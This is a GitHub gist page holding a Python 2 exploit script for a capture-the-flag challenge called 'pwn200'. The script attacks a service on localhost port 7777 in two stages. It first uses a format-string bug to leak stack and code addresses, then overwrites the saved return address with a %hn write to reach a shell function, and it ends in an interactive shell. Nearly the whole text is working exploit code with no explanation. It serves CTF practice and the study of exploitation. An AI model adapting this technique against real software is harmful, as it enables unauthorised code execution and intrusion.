Created
May 18, 2014 09:49
-
-
Save Bartol0/283564a864e270b554ef to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#DS CTF pwn200 exploit by Bartol | |
from socket import * | |
import time,re,struct,sys | |
def send_fstring(fstring,sock): | |
fullstring='tan'+fstring | |
print ' * Sending: '+fullstring.ljust(63,"A") | |
sock.send(fullstring.ljust(63,"A")) | |
time.sleep(0.2) | |
sock.send("9\n") | |
for count in range(1,10): | |
sock.send('-1111111111') | |
time.sleep(0.1) | |
sock.send("\n") | |
def receive(sock): | |
msg = '' | |
sock.settimeout(0.2) | |
try: | |
chunk = sock.recv(4096) | |
while chunk: | |
msg = msg + chunk | |
chunk = sock.recv(4096) | |
except: | |
print "Remote socket timeout.." | |
return msg | |
def interact(sock): | |
while 1: | |
command = sys.stdin.readline() | |
sock.send(command) | |
outp = receive(sock) | |
print outp | |
sock = socket(AF_INET, SOCK_STREAM) | |
sock.connect(('localhost', 7777)) | |
print "Stage1..." | |
send_fstring('StackLeak-->%4$p<--.TextLeak-->%31$p<--',sock) | |
outp=receive(sock) | |
stackleak = re.search('StackLeak-->([0-9A-z]+?)<--', outp).group(1) | |
textleak = re.search('TextLeak-->([0-9A-z]+?)<--', outp).group(1) | |
print " * Stack leaked adress is: " + stackleak | |
print " * .text leaked address is: " + textleak | |
stackaddr=int(stackleak,16) | |
textaddr=int(textleak,16) | |
saved_eip_addr=stackaddr+0x44#stack offset | |
shell_addr=textaddr+0x69#.text offset | |
print " * Saved EIP is at: 0x%x" % saved_eip_addr | |
print " * Shell func is at: 0x%x" % shell_addr | |
saved_eip_addr_pack=struct.pack("<I",saved_eip_addr) | |
print "Stage2..." | |
width=(shell_addr-315) & 0xffff | |
send_fstring(saved_eip_addr_pack+"%"+str(width)+"p"+"%43$hn",sock) | |
outp=receive(sock) | |
print "Entering shell.." | |
interact(sock) | |
sock.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment